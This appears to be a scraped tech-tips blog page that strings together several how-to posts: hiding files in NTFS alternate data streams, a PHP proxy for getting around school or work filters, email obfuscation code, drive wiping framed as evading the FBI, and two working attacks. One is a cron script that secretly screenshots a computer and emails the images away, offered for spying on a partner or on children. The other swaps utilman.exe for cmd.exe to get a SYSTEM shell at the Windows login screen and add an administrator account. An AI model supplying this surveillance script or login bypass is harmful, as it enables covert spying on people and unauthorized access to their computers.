Chances are if you’re running Windows you are also using NTFS as your partition format. Little did you know there is a cool way to hide data using Alternate Data Streams.
image by existentist
According to heysoft.de
“In NTFS, a file consists of different data streams. One stream holds the security information (access rights and such things), another one holds the “real data” you expect to be in a file. There may be another stream with link information instead of the real data stream, if the file actually is a link. And there may be alternate data streams, holding data the same way the standard data stream does.”
Supposedly a man could hide a lot of data in these alternate data streams – aka forks. By using something as simple as the command prompt you can create and modify an ADS. You can hide ASCII data as well as binary data provided the correct commands.
Some examples:
Create an ADS:
notepad visible.txt:hidden.txt
Insert ASCII data into a second ADS (yes, you can do multiples):
type atextfile > visible.txt:hidden2.txt
Copy the ADS back into a ‘normal’ file:
more < visible.txt:hidden2.txt > newfile.txt
See more examples at heysoft.de. It also possible to hide this data into directories.
NOTE: ADSs are not secure in any way. This method simply hides data from default views. It is possible to see the ADSs in Vista with the dir /R! Other tools are available for earlier OSs.
What would be really cool is some sort of hybrid cryptography ADS with passwords. Any additions to this thought? Leave us a comment.
[via heysoft.de]
![[Slashdot]](http://slashdot.org/favicon.ico)
![[Digg]](http://digg.com/favicon.ico)
![[Reddit]](http://reddit.com/favicon.ico)
![[del.icio.us]](http://images.del.icio.us/static/img/delicious.small.gif)
![[Facebook]](http://www.facebook.com/favicon.ico)
![[Technorati]](http://technorati.com/favicon.ico)
![[Google]](http://www.google.com/favicon.ico)
![[StumbleUpon]](http://www.stumbleupon.com/favicon.ico)
By using a web host that has PHP you can bypass almost any web filter and access blocked sites by using a proxy script named Glype.
From the Glype site:
Glype Proxy is a free web-based proxy script written in PHP. It allows webmasters to quickly and easily set up their own proxy site. There is a huge market for these proxy websites that allow both anonymous browsing and bypassing network filters at school, college or work.
Despite the huge popularity of these sites, the choice of scripts available is limited with most either incomplete or problematic. Glype Proxy is intended to be a fast and reliable alternative to the widely used PHProxy (now discontinued) and CGIProxy.
The process of installation couldn’t be any simpler:
- Upload the contents of the ‘upload’ folder inside of the Glype download to a secret directory on your webserver. It is a very good idea to add password protection to this directory (thanks Roland)
.
- Navigate to the appropriate URL where you installed Glype. Ex. http://yourdomain.com/mysecretdirectory/index.php. You should see a screen similar to this:
- Type the URL in the box and browse away!
Now you know how simple it is to bypass any web proxy with your very own! Note that Glype also has many other configurable options such as themes (the default is horrid), blacklist/whitelist, plugins, and more.
If you have different PHP proxy scripts that you use, let us know in the comments. How do they compare to Glype?
Silvan over at techblog.tilllate.com has done some research results for us on the best ways of obfuscating email addresses on a web page.
The method used involved nine different code snippits and came up with three over a period of one and a half years that received zero spam.
The Three Methods:
- Changing the code direction with CSS:
-
-
span.codedirection { unicode-bidi:bidi-override; direction: rtl; }
-
</style>
-
<p><span class="codedirection">email@domain.com
</span></p>
- Using CSS display:none:
-
-
p span.displaynone { display:none; }
-
</style>
-
<p>email@
<span class="displaynone">null
</span>domain.com
</p>
- ROT13 Encryption (using rot13 or str_rot13):
-
-
document.write("<n uers=\"znvygb:fvyinasbbone10@gvyyyngr.pbz\" ery=\"absbyybj\">".replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c<="Z"?90:122)>=(cc=c.charCodeAt(0)+13)?c:c-26);}));
-
</script>silvanfoobar’s Mail</a>
See more about this at techblog.tilllate.com. I noticed he didn’t other methods that I’ve seen such as breaking out the email address in a non-visible table, etc.
Have any other tips to obfuscate email addresses? Let us know in the comments.
Not a Linux user? Stay tuned, I will be posting a Windows version soon.
Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.
By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.
The process is as follows:
- Cron takes a screen shot of the desktop and saves it to a file using the import command.
- Cron emails the screenshot to a specified address on a specific interval by using mutt.
The process is quite simple. Just open your terminal follow these steps (tested on Ubuntu, should work on other distros as well):
- Install postfix, mutt, and imagemagick (for import):
sudo apt-get install postfix mutt imagemagick
- Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
nano /path/to/message.txt
-
Create a file named ’spy.sh’ (save it somewhere secretive) and add the following lines (fifth and sixth lines are one line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory tho):
#!/bin/sh
NOW=$(date +%Y%m%d%k%M)
cd /tmp
import -window root screenshot-$NOW.jpg
mutt -s "Screenshot for $NOW" -a ./screenshot-$NOW.jpg emailaccount@domain.com < /path/to/message.txt
rm /tmp/screenshot-$NOW.jpg
- Now make the spy.sh executable:
chmod u+x /path/to/spy.sh
- Run the following (my cron didn’t run without it):
sudo touch /etc/cron.deny
- Edit your crontab ‘ sudo crontab -e‘ and enter the following:
*/5 * * * * /path/to/spy.sh
WARNING: This will email you a screen shot every 5 minutes. While this is great for spying beware that your email could fill up pretty quick! Take out some minutes in your crontab to decrease the interval ex, */10 for every 10 minutes or */20 for every 20 minutes.
TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!
TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.
That’s it! You should start receiving screen shots of your desktop in action once the crontab has been hit the first cycle. If you have any problems or questions feel free to leave a comment.
Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Lets hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ’self contained floppy disc’ that securely wipes all hard drives detected on the local PC.
From the README:
1.0 About Darik’s Boot and Nuke
——————————–
Darik’s Boot and Nuke (”DBAN”) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.
Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk a boot from it!
Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).
I know a lot of you know longer have floppy drives – there are more convenient DBAN CD images available.
How to automatically wipe all hard drives
WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVE HOOKED TO THE PC!!!
- Boot from the DBAN floppy or CD image.
- Enter ‘autonuke’ at the boot prompt.
And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!
Have you ever changed or forgotten your Windows password? Fear not because I have the solution for you – and its completely free.
The following method works on Windows XP and Vista.
All you need is a Linux live CD (that auto mounts Windows partitions – ex. Ubuntu, Backtrack, Fedora, openSUSE).
Save the .iso and burn it to a disc.
Boot from the CD and follow these simple instructions – these instructions are assuming your are using backtrack, but should be similar for other Linux distributions:
- Open a Linux terminal and enter the following commands:
- cd /mnt
- ls (Take note of the folders listed here. You might need them in the next step.)
- cd sda1/Windows/System32/ (If this didn’t work you might have the wrong hard drive, try replacing ’sda1′ with sda2, hda1, or hda2)
- mv utilman.exe utilman.old && cp cmd.exe utilman.exe
- reboot (and remove the CD)
- Once rebooted, at Vista or XP log in screen, Press Windows key + U to run CMD with system privileges. Replace username below with the one of your choice – it must not already exist!
- c:\>net user username mypassword /add
- c:\>net localgroup administrators username /add
- Log in with the new admin account!
After completing don’t forget to copy the utilman.old back to utilman.exe or you will leave your system vulnerable – this is very important!!
I hope this helped in regaining access into your XP or Vista PC and if you know of any other tips like this please let us know in the comments.
UPDATE: Here is a backtrack video tutorial that covers the instructions.
